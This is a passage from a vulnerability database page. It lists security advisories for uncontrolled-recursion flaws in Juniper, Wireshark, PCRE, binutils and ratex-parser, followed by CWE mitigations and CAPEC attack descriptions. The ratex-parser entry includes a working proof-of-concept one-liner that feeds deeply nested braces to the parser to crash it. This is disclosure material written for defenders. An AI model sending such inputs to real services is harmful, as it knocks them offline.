      "url": "https://github.com/graphql-rust/juniper/security/advisories/GHSA-4rx6-g5vg-5f3j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31173"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphql-rust/juniper/commit/2b609ee057be950e3454b69fadc431d120e407bb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphql-rust/juniper/commit/8d28cdba6eb10f53490ba41d1b5cb40506c2de22"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/graphql-rust/juniper"
    },
    {
      "type": "WEB",
      "url": "https://github.com/graphql-rust/juniper/blob/juniper-v0.15.10/juniper/CHANGELOG.md#01510-2022-07-28"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2022-0038.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow"
}

GHSA-4V8G-W2M4-45P8

Vulnerability from github – Published: 2022-05-13 01:48 – Updated: 2025-04-20 03:39
VLAI
Details

In Wireshark 2.2.7, PROFINET IO data with a high recursion depth allows remote attackers to cause a denial of service (stack exhaustion) in the dissect_IODWriteReq function in plugins/profinet/packet-dcerpc-pn-io.c.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-9766"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-06-21T07:29:00Z",
    "severity": "HIGH"
  },
  "details": "In Wireshark 2.2.7, PROFINET IO data with a high recursion depth allows remote attackers to cause a denial of service (stack exhaustion) in the dissect_IODWriteReq function in plugins/profinet/packet-dcerpc-pn-io.c.",
  "id": "GHSA-4v8g-w2m4-45p8",
  "modified": "2025-04-20T03:39:25Z",
  "published": "2022-05-13T01:48:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9766"
    },
    {
      "type": "WEB",
      "url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13811"
    },
    {
      "type": "WEB",
      "url": "https://code.wireshark.org/review/gitweb?p=wireshark.git%3Ba=commit%3Bh=d6e888400ba64de3147d1111a4c23edf389b0000"
    },
    {
      "type": "WEB",
      "url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=d6e888400ba64de3147d1111a4c23edf389b0000"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/01/msg00010.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99187"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4W5H-HX6R-28Q7

Vulnerability from github – Published: 2026-07-07 23:39 – Updated: 2026-07-07 23:39
VLAI
Summary
ratex-parser has unbounded parser recursion that leads to stack overflow (process abort)
Details

Summary

RaTeX’s recursive-descent parser recurses one (or more) native stack frame per nesting level at {, \left, \sqrt{, ^{, etc, with no maximum depth limit. A short, ~10 KB input of nested groups overflows the 8 MB main-thread stack and aborts the process. With panic = "abort" (Cargo.toml:48), and because a Rust stack overflow is always a fatal SIGABRT regardless of panic strategy this is an unrecoverable, whole-process denial of service reachable from a single untrusted LaTeX string.

Details

The mutual recursion has no depth guard (crates/ratex-parser/src/parser.rs):

parse_expression (:113)  ->  parse_atom (:281/285)  ->  parse_group (:451)
                                  ^                          |
                                  |   on '{' (:459) recurse  |
                                  +--------------------------+

\left adds another recursive edge: handle_leftparse_expression (crates/ratex-parser/src/functions/left_right.rs:47). The only counters present are unrelated to depth: leftright_depth (a \right-matching counter, parser.rs:24) and the macro expander’s max_expand = 1000 (macro_expander.rs:64), which does not gate brace / \left recursion (those tokens never pass through expand_once). There is no recursion_limit/depth parameter on parse_group, parse_expression, or parse_atom.

PoC

image

$ python3 -c 'import sys;sys.stdout.write("{"*200000+"x"+"}"*200000)' | ./target/release/parse
thread 'main' has overflowed its stack
fatal runtime error: stack overflow, aborting
Aborted (core dumped)            # exit 134

(Other nesting forms work equally, e.g. \left(×N, \sqrt{×N, ^{×N.)

Impact

A single small request crashes the whole RaTeX process. In a typical server-side math-rendering service this is a reliable, unauthenticated DoS; on smaller worker-thread stacks (e.g. a 512 KB async runtime thread) only a few hundred bytes of nesting are required.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "ratex-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53531"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-07T23:39:30Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\n\nRaTeX\u2019s recursive-descent parser recurses one (or more) native stack frame per nesting level at `{`, `\\left`, `\\sqrt{`, `^{`, etc, with **no maximum depth limit**. A short, ~10 KB input of nested groups overflows the 8 MB main-thread stack and aborts the process. With `panic = \"abort\"` (`Cargo.toml:48`), and because a Rust stack overflow is always a fatal `SIGABRT` regardless of panic strategy this is an unrecoverable, whole-process denial of service reachable from a single untrusted LaTeX string.\n\n### Details\n\nThe mutual recursion has no depth guard (`crates/ratex-parser/src/parser.rs`):\n\n```\nparse_expression (:113)  -\u003e  parse_atom (:281/285)  -\u003e  parse_group (:451)\n                                  ^                          |\n                                  |   on \u0027{\u0027 (:459) recurse  |\n                                  +--------------------------+\n```\n\n`\\left` adds another recursive edge: `handle_left` \u2192 `parse_expression` (`crates/ratex-parser/src/functions/left_right.rs:47`). The only counters present are unrelated to depth: `leftright_depth` (a `\\right`-matching counter, `parser.rs:24`) and the macro expander\u2019s `max_expand = 1000` (`macro_expander.rs:64`), which does **not** gate brace / `\\left` recursion (those tokens never pass through `expand_once`). There is no `recursion_limit`/depth parameter on `parse_group`, `parse_expression`, or `parse_atom`.\n\n### PoC\n\n\u003cimg width=\"1097\" height=\"158\" alt=\"image\" src=\"https://github.com/user-attachments/assets/29b837a2-c455-4cb6-a055-514b31c999c6\" /\u003e\n\n\n```\n$ python3 -c \u0027import sys;sys.stdout.write(\"{\"*200000+\"x\"+\"}\"*200000)\u0027 | ./target/release/parse\nthread \u0027main\u0027 has overflowed its stack\nfatal runtime error: stack overflow, aborting\nAborted (core dumped)            # exit 134\n```\n\n(Other nesting forms work equally, e.g. `\\left(`\u00d7N, `\\sqrt{`\u00d7N, `^{`\u00d7N.)\n\n### Impact\n\nA single small request crashes the whole RaTeX process. In a typical server-side math-rendering service this is a reliable, unauthenticated DoS; on smaller worker-thread stacks (e.g. a 512 KB async runtime thread) only a few hundred bytes of nesting are required.",
  "id": "GHSA-4w5h-hx6r-28q7",
  "modified": "2026-07-07T23:39:30Z",
  "published": "2026-07-07T23:39:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/erweixin/RaTeX/security/advisories/GHSA-4w5h-hx6r-28q7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/erweixin/RaTeX"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "ratex-parser has unbounded parser recursion that leads to stack overflow (process abort)"
}

GHSA-5457-7WX3-GF7J

Vulnerability from github – Published: 2022-05-13 01:11 – Updated: 2025-04-20 03:40
VLAI
Details

In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-11164"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-11T03:29:00Z",
    "severity": "HIGH"
  },
  "details": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.",
  "id": "GHSA-5457-7wx3-gf7j",
  "modified": "2025-04-20T03:40:31Z",
  "published": "2022-05-13T01:11:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "http://openwall.com/lists/oss-security/2017/07/11/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/04/11/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/04/12/1"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99575"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-54MP-4694-9J92

Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-08-16 00:00
VLAI
Details

A flaw was discovered in GNU libiberty within demangle_path() in rust-demangle.c, as distributed in GNU Binutils version 2.36. A crafted symbol can cause stack memory to be exhausted leading to a crash.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-3530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-02T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was discovered in GNU libiberty within demangle_path() in rust-demangle.c, as distributed in GNU Binutils version 2.36. A crafted symbol can cause stack memory to be exhausted leading to a crash.",
  "id": "GHSA-54mp-4694-9j92",
  "modified": "2022-08-16T00:00:42Z",
  "published": "2022-05-24T19:03:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3530"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1956423"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-30"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210716-0006"
    },
    {
      "type": "WEB",
      "url": "https://src.fedoraproject.org/rpms/binutils/blob/rawhide/f/binutils-CVE-2021-3530.patch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Ensure that an end condition will be reached under all logic conditions. The end condition may include checking against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.

Mitigation
Implementation

Increase the stack size.

CAPEC-230: Serialized Data with Nested Payloads

Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.

CAPEC-231: Oversized Serialized Data Payloads

An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.